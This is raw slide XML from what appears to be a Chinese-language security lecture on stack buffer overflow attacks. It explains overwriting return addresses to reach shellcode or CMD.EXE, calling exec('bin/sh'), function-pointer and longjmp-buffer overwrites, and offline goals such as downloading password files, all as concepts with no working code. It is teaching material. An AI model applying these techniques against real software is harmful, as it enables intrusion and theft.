            <a:ext cx="2051050" cy="719931"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 72120"/>
              <a:gd name="adj2" fmla="val -215416"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>溢出覆盖后的</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>返回地址</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274347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blinds(horizontal)">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9012"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="299012"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="299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9" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="2060848"/>
            <a:ext cx="7705551" cy="2274457"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8647272" y="6407944"/>
            <a:ext cx="365760" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4753859A-D0C7-42A6-9AD8-4DFB179EB5CB}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>229</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301058" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如何能够进行系统调用？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2267744" y="4509120"/>
            <a:ext cx="3096344" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22804"/>
              <a:gd name="adj2" fmla="val -181922"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>调整该地址，指向</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>系统调用程序，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>CMD.EXE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185921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zh-CN" altLang="en-US"/>
              <a:t>下载口令文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>下载加密的文本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>复制大量的数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94212" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>离线</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94210" name="灯片编号占位符 1"/>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B340F8F0-D567-44B7-82E8-884D1EBD02ED}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="480984010"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>
  </p:transition>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a:xfrm>
            <a:off x="0" y="1179307"/>
            <a:ext cx="8686800" cy="4523638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当调用函数时</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指令将返回地址（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指令下一条指令地址）压栈</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指令会把压栈的返回地址弹给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（指令寄存器）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈溢出攻击的原理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出修改栈中返回地址，使其指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数返回，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>取篡改后的返回地址，并执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>挑战</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、准确定位函数返回地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、篡改返回地址指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270338" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈溢出攻击的原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6A1A76DD-83F5-47DB-9B88-5D54EAD265D5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>230</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5194623" y="4005064"/>
            <a:ext cx="3841872" cy="2760985"/>
            <a:chOff x="1651" y="1253"/>
            <a:chExt cx="2610" cy="1966"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7"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局部变量</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8"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9"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10"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11"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12"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13" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1651" y="1570"/>
              <a:ext cx="539" cy="329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>低端</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1651" y="2523"/>
              <a:ext cx="540" cy="329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>高端</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15"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16"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17"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8"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9"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20"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5089744"/>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a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>攻击瞄准器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24481248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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击代码安排</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码植入；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用已存在代码；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流程控制：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>改写程序执行流程，转移到攻击代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一步完成代码植入和流程控制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>步骤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252"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7D5522D-B54D-407F-9DBF-933D3458927E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>231</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码植入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在存在漏洞的某些存储结构（缓冲区）中安排适当的攻击代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用已存在的代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查找代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>exec(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，并修改参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击代码安排</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5427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E5D09E17-9764-448B-AC7D-A2AAB6A338CA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>232</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>激活记录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>溢出缓冲区，用攻击代码地址覆盖函数返回地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数指针</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数指针可定位任何地址空间，并执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>溢出在函数指针附近的缓冲区，修改函数指针的地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>长跳转缓冲区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语言中的检验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恢复系统，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>setjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序异常处理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
